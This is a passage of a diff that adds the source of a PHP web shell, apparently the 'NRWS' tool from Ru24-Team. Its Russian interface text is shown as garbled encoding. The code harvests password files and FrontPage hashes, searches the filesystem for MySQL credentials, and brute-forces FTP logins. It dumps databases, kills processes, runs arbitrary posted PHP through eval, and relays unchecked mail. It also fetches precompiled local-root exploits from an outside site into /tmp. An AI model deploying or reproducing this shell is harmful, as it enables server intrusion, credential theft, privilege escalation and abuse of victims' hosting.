+İêñïëîèò, ïîçâîëÿşùèé îáëåã÷èòü ïîèñê ïàğîëåé ê áàçå äàííûõ. Ïğîèçâîäèòñÿ ïîèñê ôàéëîâ ñ óïîìèíàíèåì ğÿäà ñòğîê, óêàçûâàşùèõ íà êîííåêò ê MySQL. Òàêæå âîçìîæíî ñîâïàäåíèå ïàğîëåé ñ äğóãèìè ñåğâèñàìè ñåğâåğà. Ïàğîëè â áîëüøåíñòâå ñëó÷àåâ èëè âîâñå íå çàøèôğîâàíû, èëè çàøèôğîâàíû îáğàòèìûì àëãîğèòìîì. Ïğîàíàëèçèğîâàâ ôàéëû, óêàçàííûå ıêñïëîèòîì, âû áûñòğî íàéäåòå ïàğîëü ê MySQL.<br><br>
+<a href='?ac=ftp'><b>FTP Brut by xoce</b></a><br>
+Ïîëíîöåííûé áğóòôîğñåğ, ğàáîòàşùèé ïî ìåòîäó ïîäñòàíîâêè ïàğîëåé, êîòîğûå áåğåò èç ôàéëà. Ôàéë ãåíåğèğóåòñÿ ñàì, âû òîëüêî óêàçûâàåòå ÷èñëî ïàğîëåé è... âñå - ïåğåáîğ íà÷èíàåòñÿ!!! Ñ ïîìîùüş äàííîãî áğóòôîğñåğà âû ñìîæåòå ïîäîáğàòü ïàğîëü ê ëşáîìó õîñòèíãó áåç ïğîáëåì! ×òîáû áûëî ÷òî ïåğåáèğàòü, áûëà äîáàâëåíà áàçà ïàğîëåé, êîòîğàÿ ãåíåğèğóåòñÿ íà ëåòó (íå ïèøèòå áîëüøèå öèôğû â êîëè÷åñòâå ïàğîëåé, òàê êàê ıòî ñåğüåçíàÿ íàãğóçêà íà ñåğâåğ! 10000 âïîëíå õâàòèò).<br><br>
+<a href='?ac=ftppass'><b>FTP login:login Brut by Terabyte</b></a><br>
+İêñïëîèò ïîçâîëÿåò ïåğåáğàòü àêêàóíò íà FTP íà ñâÿçêó login:login. ×åì áîëüøå şçåğîâ â /etc/passwd, òåì áîëüøå âåğîÿòíîñòü óäà÷íîé ğàáîòû ıêñïëîèòà.<br><br>
+<a href='?ac=shell'><b>Íåêîòîğûå äğóãèå ìèíè-ıêñïëîèòû ïğèâåäåíû çäåñü â àëüÿñàõ.</b></a><br>";
+break;
+case "frontpage":
+$p=getenv("DOCUMENT_ROOT");
+if(exec("cat /etc/passwd")){
+$ex=explode("/", $p);
+$do_login=substr($p,0,strpos($p,$ex[2]));
+$next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
+exec("cat /etc/passwd", $passwd);
+for($i=0; $i<=count($passwd); $i++) {
+$xz=explode(":", $passwd[$i]);
+$file="/".$do_login.$xz[0].$next_login."/_vti_pvt/service.pwd";
+if(exec("cat ".$file)){
+exec("cat ".$file,$open);
+$a=$open[count($open)-1];
+$fr=strpos($a, ":");
+$open1=substr($a, $fr);
+if($xz[4]=='') {
+$file1="/".$do_login.$xz[0].$next_login."/_vti_pvt/.htaccess";
+Unset($domain);
+exec("cat ".$file1,$domain);
+$domain1=explode(" ",$domain[8]);
+$xz[4]=$domain1[1];
+}
+echo $xz[0].$open1.":".$xz[2].":".$xz[3].":".$xz[4].":".$xz[5].":".$xz[6]."<br>";
+} } 
+}
+elseif(is_file("/etc/passwd")){
+$ex=explode("/", $p);
+$passwd="/etc/passwd";
+echo "Ïóòü:&nbsp".$p."<br>"; 
+$do_login=substr($p,0,strpos($p,$ex[2]));
+$next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
+if(is_file($passwd)) {
+$open=fopen($passwd,"r");
+while (!feof($open)) {
+$str=fgets($open, 100);
+$mas=explode(":", $str);
+$file="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/service.pwd";
+if(is_file($file)) {
+echo $mas[0];
+$open1=fopen($file, "r");
+$str1=fread($open1,filesize($file));
+fclose($open1);
+$fr=strpos($str1, ":");
+$str2=substr($str1, $fr);
+$str2=rtrim($str2);
+//
+if($mas[4]=='') {
+$file1="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/.htaccess";
+$open2=fopen($file1,"r");
+$domain=fread($open2,filesize($file1));
+fclose($open2);
+$domain1=substr($domain,106,110);
+$domain2=explode("AuthUserFile",$domain1);
+$mas[4]=$domain2[0];
+}
+//
+echo $str2.":".$mas[2].":".$mas[3].":".$mas[4].":".$mas[5].":".$mas[6]."<br>";
+}
+} 
+fclose($open);
+}
+}
+else{
+echo "Ñ ïàññîì îáëîì :(((";
+}
+break;
+case "dbexploit":
+echo "<PRE>";
+echo "<b>Â ôàéëå ïğèñóòñòâóåò ôóíêöèÿ mysql_connect: </b><br>";
+exec("find / -name *.php | xargs grep -li mysql_connect");
+exec("find / -name *.inc | xargs grep -li mysql_connect");
+exec("find / -name *.inc.php | xargs grep -li mysql_connect");
+echo "<b>Â ôàéëå ïğèñóòñòâóåò ôóíêöèÿ mysql_select_db: </b><br>";
+exec("find / -name *.php | xargs grep -li mysql_select_db");
+exec("find / -name *.inc | xargs grep -li mysql_select_db");
+exec("find / -name *.inc.php | xargs grep -li mysql_select_db");
+echo "<b>Â ôàéëå ïğèñóòñòâóåò óïîìèíàíèå ïàğîëÿ: </b><br>";
+exec("find / -name *.php | xargs grep -li $password");
+exec("find / -name *.inc | xargs grep -li $password");
+exec("find / -name *.inc.php | xargs grep -li $password");
+exec("find / -name *.php | xargs grep -li $pass");
+exec("find / -name *.inc | xargs grep -li $pass");
+exec("find / -name *.inc.php | xargs grep -li $pass");
+echo "<b>Â ôàéëå ïğèñóòñòâóåò ñëîâî localhost: </b><br>";
+exec("find / -name *.php | xargs grep -li localhost");
+exec("find / -name *.inc | xargs grep -li localhost");
+exec("find / -name *.inc.php | xargs grep -li localhost");
+echo "</PRE>"; 
+break;
+// ñïèñîê ïğîöåññîâ
+case "ps":
+echo "<b>Ïğîöåññû â ñèñòåìå:</b><br>";
+ 
+  echo "<br>";
+  if ($pid)
+  {
+   if (!$sig) {$sig = 9;}
+   echo "Îòïğàâëåíèå êîìàíäû ".$sig." to #".$pid."... ";
+   $ret = posix_kill($pid,$sig);
+   if ($ret) {echo "Âñå, ïğîöåññ óáèò, àìèíü";}
+   else {echo "ÎØÈÁÊÀ! ".htmlspecialchars($sig).", â ïğîöåññå #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Íåâîçìîæíî îòîáğàçèòü ñïèñîê ïğîöåññîâ! Âèäíî, çëîé àäìèí çàïğåòèë ps";}
+  else
+  {
+   $ret = htmlspecialchars($ret);
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
+   if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
+   $k = $ps_aux_sort[0];
+   if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."a\"></a>";}
+   else {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."d\"></a>";}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+	{
+	 echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10,count($line)));
+     $line = array_slice($line,0,11);
+     $line[] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+   $head[$k] = "<b>".$head[$k]."</b>".$y;
+   $head[] = "<b>ACTION</b>";
+   $v = $ps_aux_sort[0];
+   usort($prcs,"tabsort");
+   if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
+   $tab = array();
+   $tab[] = $head;
+   $tab = array_merge($tab,$prcs);
+   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+   foreach($tab as $k)
+   {
+    echo "<tr>";
+    foreach($k as $v) {echo "<td>".$v."</td>";}
+    echo "</tr>";
+   }
+   echo "</table>";
+  }
+break;
+// exploits for root...
+case "exploits":
+// thanks to xoce
+$public_site = "http://hackru.info/adm/exploits/public_exploits";
+$private_site = "http://hackru.info/adm/exploits/private_exploits";
+echo"İòîò ğàçäåë ñîçäàí ïî ğÿäó ïğè÷èí. Âî-ïåğâûõ, óæå íàäîåëî èñêàòü îäíè è òåæå ıêñïëîèòû, âî-âòîğûõ - êîìïèëèğîâàíèå è èñïğàâëåíèå ñîğöîâ ïîä êîíêğåòíóş ïëàòôîğìó óæå òîæå íå ïğèíîñèò óäîâîëüñòâèÿ. Âñå ıêñïëîèòû ñêîìïèëèğîâàíû è íàñòğîåíû. Ñàìîìó êîìïèëèğîâàòü áûëî âëîì, ïîıòîìó âîñïîëüçîâàëñÿ ãîòîâûìè :) Âûğàæàş áëàãîäàğíîñòü xoce (hackru.info)<br><br>
+<a href='?ac=upload&file3=$public_site/m&file2=/tmp'>Local ROOT for linux 2.6.20 - mremap (./m)</a><br>
+<a href='?ac=upload&file3=$public_site/p&file2=/tmp'>Local ROOT for linux 2.6.20 - ptrace (./p)</a><br>
+<a href='?ac=upload&file3=$private_site/brk&file2=/tmp'>BRK - Local Root Unix 2.4.*(./brk)</a><br>
+<a href='?ac=upload&file3=$private_site/sortrace&file2=/tmp'>Traceroute v1.4a5 exploit by sorbo (./sortrace)</a><br>
+<a href='?ac=upload&file3=$private_site/root&file2=/tmp'>Local Root Unix 2.4.* (./root)</a><br>
+<a href='?ac=upload&file3=$private_site/sxp&file2=/tmp'>Sendmail 8.11.x exploit localroot (./sxp)</a><br>
+<a href='?ac=upload&file3=$private_site/ptrace_kmod&file2=/tmp'>Local Root Unix 2.4.* (./ptrace_kmod)</a><br>
+<a href='?ac=upload&file3=$private_site/mr1_a&file2=/tmp'>Local Root Unix 2.4.* (./mr1_a)</a><br><br>";
+echo "Èñïîëüçîâàíèå: çàõîäèòå â /tmp èç bash øåëëà è çàïóñêàéòå ôàéëû çàïóñêà.<br>
+Ïğèìåğ: cd /tmp; ./m - âñå, ıêñïëîèò çàïóñòèòñÿ, è åñëè âñå ok, òî âû ïîëó÷èòå ïğàâà root'a!<br>
+Åñëè çäåñü íå îêàçàëîñü ïîäõîäÿùåãî ıêñïëîèòà, òî ïîñåòèòå <a href=http://www.web-hack.ru/exploits/>www.web-hack.ru/exploits/</a> è <a href=http://security.nnov.ru>security.nnov.ru</a>.";
+
+break;
+case "damp":
+
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     // èíôà î äàìïå
+     $sql1  = "# MySQL dump created by NRWS\r\n";
+     $sql1 .= "# homepage: http://www.Ru24-Team.NET\r\n";
+     $sql1 .= "# ---------------------------------\r\n";
+     $sql1 .= "#     date : ".date ("j F Y g:i")."\r\n";
+     $sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
+     $sql1 .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     // ïîëó÷àåì òåêñò çàïğîñà ñîçäàíèÿ ñòğóêòóğû òàáëèöû
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     $sql2 = '';
+
+     // ïîëó÷àåì äàííûå òàáëèöû
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while ($row = @mysql_fetch_assoc($res)) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     echo "<center><b>Ãîòîâî! Äàìï ïğîøåë óäà÷íî!</b></center>";
+    // ïèøåì â ôàéë èëè âûâîäèì â áğàóçåğ
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    } // end if(@mysql_select_db($_POST['mysql_db'],$db))
+
+    else echo "Òàêîé ÁÄ íåò!";
+   @mysql_close($db);
+   } // end if($db)
+  else echo "Íåò êîííåêòà c ñåğâåğîì!";
+ } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
+ else if(!empty($_POST['dif'])&&!$fp) { echo "ÎØÈÁÊÀ, íåò ïğàâ çàïèñè â ôàéë!"; }
+
+break;
+// SQL Attack
+case "sql":
+echo "<form name='mysql_dump' action='?ac=damp' method='post'>";
+echo "&nbsp;Áàçà: &nbsp;<input type=text name=mysql_db size=15 value=";
+echo (!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
+echo ">";
+echo "&nbsp;Òàáëèöà: &nbsp;<input type=text name=mysql_tbl size=15 value=";
+echo (!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
+echo ">";
+echo "&nbsp;Ëîãèí: &nbsp;<input type=text name=mysql_l size=15 value=";
+echo (!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
+echo ">";
+echo "&nbsp;Ïàğîëü: &nbsp;<input type=text name=mysql_p size=15 value=";
+echo (!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
+echo ">";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=mysql_dump>";
+echo "<br>&nbsp;Ñîõğàíèòü äàìï â ôàéëå: <input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=85 value=";
+echo (!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
+echo ">";
+echo "<input type=submit name=submit value=Ñîõğàíèòü>" ;
+echo "</font>";
+echo "</form>"; 
+ print "<tr><td>";
+###
+
+@$php_self=$_GET['PHP_SELF'];
+@$from=$_GET['from'];
+@$to=$_GET['to'];
+@$adress=$_POST['adress'];
+@$port=$_POST['port'];
+@$login=$_POST['login'];
+@$pass=$_POST['pass'];
+@$adress=$_GET['adress'];
+@$port=$_GET['port'];
+@$login=$_GET['login'];
+@$pass=$_GET['pass'];
+if(!isset($adress)){$adress="localhost";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+?>
+
+<body vLink=white>
+<font color=black face=verdana size=1>
+<form>  <? if(!@$conn){ ?>
+<table><tr><td valign=top>
+<input type=hidden name=ac value=sql>
+<tr><td valign=top>Õîñò: </tr><td><input name=adress value='<?=$adress?>' size=20></td></tr>
+<tr><td valign=top>Ïîğò: </tr><td><input name=port value='<?=$port?>' size=6></td></tr>
+<tr><Td valign=top>Ëîãèí: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
+<tr><Td valign=top>Ïàğîëü: </td><td> <input name=pass value='<?=$pass?>' size=10>
+<input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=Ïîäêëş÷èòüñÿ></form></td></tr><?}?>
+<tr><td valign=top><? if(@$conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td>
+</td></tr>
+</table>
+<table width=100%><tr><td>
+<?
+@$conn=$_GET['conn'];
+@$adress=$_GET['adress'];
+@$port=$_GET['port'];
+@$login=$_GET['login'];
+@$pass=$_GET['pass'];
+if($conn){
+
+$serv = @mysql_connect("$adress:$port", "$login", "$pass") or die("ÎØÈÁÊÀ: ".mysql_error());
+if($serv){$status="Ïîäêëş÷åí. :: <a href='$php_self?conn=0'>Âûéòè èç áàçû</a>";}else{$status="Îòêëş÷åí.";}
+print "<b><font color=green>Ñòàòóñ: $status<br><br>";
+print "<table cellpadding=0 cellspacing=0><tr><td valign=top>";
+print "<font color=red>[Òàáëèöû]</font><Br><font color=white>";
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+print "<b><a href='$php_self?ac=sql&base=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
+@$tc++;
+}
+$pro="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+@$base=$_GET['base'];
+@$db=$_GET['db'];
+print "<font color=red>[Âñåãî òàáëèö: $tc]</font><br>$pro";
+if($base){
+print "<div align=left><font color=green>Òàáëèöà: [$tbl]</div></font><br>";
+$result=mysql_list_tables($db);
+while($str=mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+print "<font color=red>[$records[0]]</font> <a href='$php_self?ac=sql&inside=1&p=sql&vn=$str[0]&base=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
+mysql_free_result($c);
+}
+} #end base
+
+@$vn=$_GET['vn'];
+print "</td><td valign=top>";
+print "<font color=green>Áàçà äàííûõ: $db => $vn</font>";
+@$inside=$_GET['inside'];
+@$tbl=$_GET['tbl'];
+if($inside){
+print "<table cellpadding=0 cellspacing=1><tr>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+print "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>";
+print "
+Âñåãî: $cfa[0]<form>
+<input type=hidden name=ac value=sql>
+Îò: <input name=from size=3 value=0>
+Äî: <input name=to size=3 value=$cfa[0]>
+<input type=submit name=show value=Ïîêàçàòü>
+<input type=hidden name=inside value=1>
+<input type=hidden name=vn value=$vn>
+<input type=hidden name=db value=$db>
+<input type=hidden name=login value=$login>
+<input type=hidden name=pass value=$pass>
+<input type=hidden name=adress value=$adress>
+<input type=hidden name=conn value=1>
+<input type=hidden name=base value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value=$tbl>
+ [<a href='$php_self?ac=sql&getdb=1&to=$cfa[0]&inside=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&base=1&p=sql&tbl=$tbl'>Çàãğóçèòü</a>]
+</form>";
+@$vn=$_GET['vn'];
+@$from=$_GET['from'];
+@$to=$_GET['to'];
+@$from=$_GET['from'];
+@$to=$_GET['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+print "<td>&nbsp;</td><td bgcolor=#BCE0FF> $name </td> ";
+}
+print "</tr>";
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+print "<tr>";
+foreach ($mn as $come=>$lee) {
+$nst_inside=htmlspecialchars($lee);
+print "<td>&nbsp;</td><td bgcolor=silver>$nst_inside</td>\r\n";
+} print "</tr>";
+}
+mysql_free_result($result);
+print "</table>";
+
+} #end inside
+print "</td></tr></table>";
+} # end $conn
+
+
+###   end of sql
+print "</tr></td></table> </td></tr></table>";
+print $copyr;
+die;
+
+
+break;
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>Èñïîëíåíèå php-êîäà (áåç "< ?  ? >")</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+// SEND MAIL
+case "sendmail":
+echo <<<HTML
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="sendmail">
+<tr>Îò êîãî: <br>
+<input type="TEXT" name="frommail">
+<br>Êîìó:<br> <input type="TEXT" name="tomailz">
+<br>Òåìà: <br><input type="TEXT" name="mailtema">
+<br>Òåêñò: <br>
+<td><textarea name="mailtext" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Îòïğàâèòü" name="submit"></td><form>
+$tend
+HTML;
+// íèêàêàÿ ïğîâåğêà íå äåëàåòñÿ, à çà÷åì ? =)
+if (isset($submit))
+{
+
+mail($tomailz,$mailtema,$mailtext,"From: $frommail");
+echo "<h2>Ñîîáùåíèå îòïğàâëåíî!</h2>";
+}
+break;
+
+
+// Èíôîğìàöèÿ î ñèñòåìå
+case "info":
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">Âêëş÷åíî</font>";
+}
+else {$safemode = false; $hsafemode = "Îòêëş÷åíî</font>";}
+/* display information */
+echo "<b>[ Èíôîğìàöèÿ î ñèñòåìå ]</b><br>";
+echo "<b>Õîñò:</b> ".$_SERVER["HTTP_HOST"]."<br>" ;
+echo "<b>IP ñåğâåğà:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>";
+echo " <b>Ñåğâåğ: </b>".$_SERVER['SERVER_SIGNATURE']."  ";
+echo "<b>OC:</b> ".exec("uname -a")."(";
+print "".php_uname()." )<br>\n";
+echo "<b>Ïğîöåññîğ:</b> ".exec("cat /proc/cpuinfo | grep GHz")."<br>";
+echo "<b>Ïğèâèëåãèè: </b>".exec("id")."<br>";
+echo "<b>Âñåãî ìåñòà: </b>" . (int)(disk_total_space(getcwd())/(1024*1024)) . " MB " . "<b>Ñâîáîäíî</b>: " . (int)(disk_free_space(getcwd())/(1024*1024)) . " MB <br>";
+echo "<b>Òåêóùèé êàòàëîã:</b>".exec("pwd")."";
+echo " <br><b>Òåêóøèé web-ïóòü: </b>".@$_SERVER['PHP_SELF']."  ";
+echo "<br><b>Òâîé IP:</b> ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")<br>";
+echo "<b>PHP version: </b>".phpversion()."<BR>";
+echo "<b> ID âëàäåëüöà ïğîöåñà: </b>".get_current_user()."<BR>";
+echo "<b>MySQL</b> : ".mysql_get_server_info()."<BR>";
+if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){
+print '<b>Åñòü äîñòóï ê /etc/passwd! </b><br>';
+}
+if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){
+print '<b>Åñòü äîñòóï ê /etc/shadow!</b> <br>';
+}
+if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){
+print '<b>Åñòü äîñòóï ê /etc/shadow-!</b> ';
+}
+if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){
+print '<b>Åñòü äîñòóï ê /etc/master.passwd! </b><br>';
+}
+if(isset($_POST['th']) && $_POST['th']!=''){
+chdir($_POST['th']);
+};
+if(is_writable('/tmp/')){
+$fp=fopen('/tmp/qq8',"w+");
+fclose($fp);
+print "/tmp - îòêğûòà&nbsp;<br>\n";
+unlink('/tmp/qq8');
+}
+else{
+print "<font color=red>/tmp - íå îòêğûòà</font><br>";
+}
+echo "<b>Áåçîïàñíûé ğåæèì: ".$hsafemode."</b><br>";
+if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   $num = $nixpasswd + $nixpwdperpage;
+   echo "<b>*nix /etc/passwd:</b><br>";
+   $i = $nixpasswd;
+   while ($i < $num)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid) {echo join(":",$uid)."<br>";}
+    $i++;
+   }
+  }
+  else {echo "<br><a href=?ac=navigation&d=/etc/&e=passwd><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/etc/userdomains")) {echo "<b><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></b><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/usr/local/apache/conf&e=httpd.conf><u><b>Êîíôèãóğàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+  { echo "<b><a href=?ac=navigation&d=/etc/httpd/conf&e=httpd.conf><u><b>Êîíôèãóğàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+   if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/etc/&e=httpd.conf><u><b>Êîíôèãóğàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+    if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/var/cpanel&e=accounting.log><u><b>cpanel log  </b></u></a></b><br>";}
+ break;
+ 
+// Î ñêğèïòå
+case "about":
+
+echo "<center><b>Ïğèâåò âñåì!</b><br><br>
+Íàêîíåö-òî NWRS äîñòóïåí â ïåğâîé ñòàáèëüíîé âåğñèè! Äîáàâèëîñü ìíîæåñòâî íîâûõ ïîëåçíûõ âîçìîæíîñòåé. Âñå ôóíêöèè ñêğèïòà ğàáîòàşò è ğàáîòàşò êîğğåêòíî. Äîáàâëåíû óíèêàëüíûå èíñòğóìåíòû äëÿ âçëîìà ñåğâåğà.  òî æå âğåìÿ íåò íè÷åãî ëèøíåãî. Âñå, ÷òî çàäóìûâàëîñü - ğåàëèçèğîâàíî. Äóìàş, êàæäûé íàéäåò â ñêğèïòå ÷òî-òî ïîëåçíîå äëÿ ñåáÿ. Òàêæå çàÿâëÿş î òîì, ÷òî ÿ çàêğûâàş ïğîåêò, èáî îí äîñòèã èäåàëà :) Ëşáîé ìîæåò åãî ïğîäîëæèòü, php - îòêğûòûé ÿçûê. Íà ïåğâûõ ïîğàõ ñêğèïò âîîáùå áûë òîëüêî ó íåñêîëüêèõ ÷åëîâåê óçêîãî êğóãà äğóçåé, ïèñàë åãî äëÿ ñåáÿ, èç-çà ñâîåé ïğèğîäíîé ëåíè.
+Íó, è ñïàñèáî ıòèì ëşäÿì:  Nitrex, Terabyte, 1dt_wolf, xoce, FUF, Shift, dodbob, m0zg, Tristram, Sanchous (îğôîãğàôèÿ è äèçàéí)... È ìíîãèì äğóãèì... Èõ èäåè î÷åíü ïîìîãëè âîïëîòèòü â æèçíü ñòîëü óíèâåğñàëüíûé èíñòğóìåíò. Îãğîìíîå ñïàñèáî èì!<br><br><b>Ïîìíèòå: èñïîëüçóÿ ıòîò ñêğèïò íà ÷óæèõ ñåğâåğàõ, âû íàğóøàåòå çàêîí :) Òàê ÷òî îñòîğîæíåå.</b></center>";
+echo "<center><br><br><em>Ïîñåòèòå ıòè ñàéòû, è âû âñåãäà áóäåòå â êóğñå ñîáûòèé:</em><br><br>
+<a href='http://www.ru24-team.net'>www.ru24-team.net</a><br><br>
+<a href='http://www.web-hack.ru'>www.web-hack.ru</a><br><br>
+<a href='http://www.rst.void.ru'>www.rst.void.ru</a><br><br>
+<a href='http://www.hackru.info'>www.hackru.info</a><br><br>
+<a href='http://www.realcoding.net'>www.realcoding.net</a><br><br>
+<a href='http://www.ccteam.ru'>www.ccteam.ru</a><br><br>
+Èçâèíÿşñü, åñëè êîãî çàáûë.<br> <em>Àâòîğ íå íåñåò îòâåòñòâåííîñòè çà ìàòåğèàëû, ğàçìåùåííûå íà ıòèõ ñàéòàõ, îcîáåííî íà ïîñëåäíåì </em>:)
+<br><br><br><br><br><b>Ñêğèïò ğàñïğîñòğàíÿåòñÿ ïî ëèöåíçèè GNU GPL<br> 22 Èşëÿ 2005 ã. &#169; DreAmeRz<br> e-mail:</b> <a href='mailto:dreamerz@mail.ru'>dreamerz@mail.ru</a><b> ICQ: </b>817312 <b>WEB: </b><a href='http://www.ru24-team.net'>http://www.Ru24-Team.NET</a>";
+break;
+
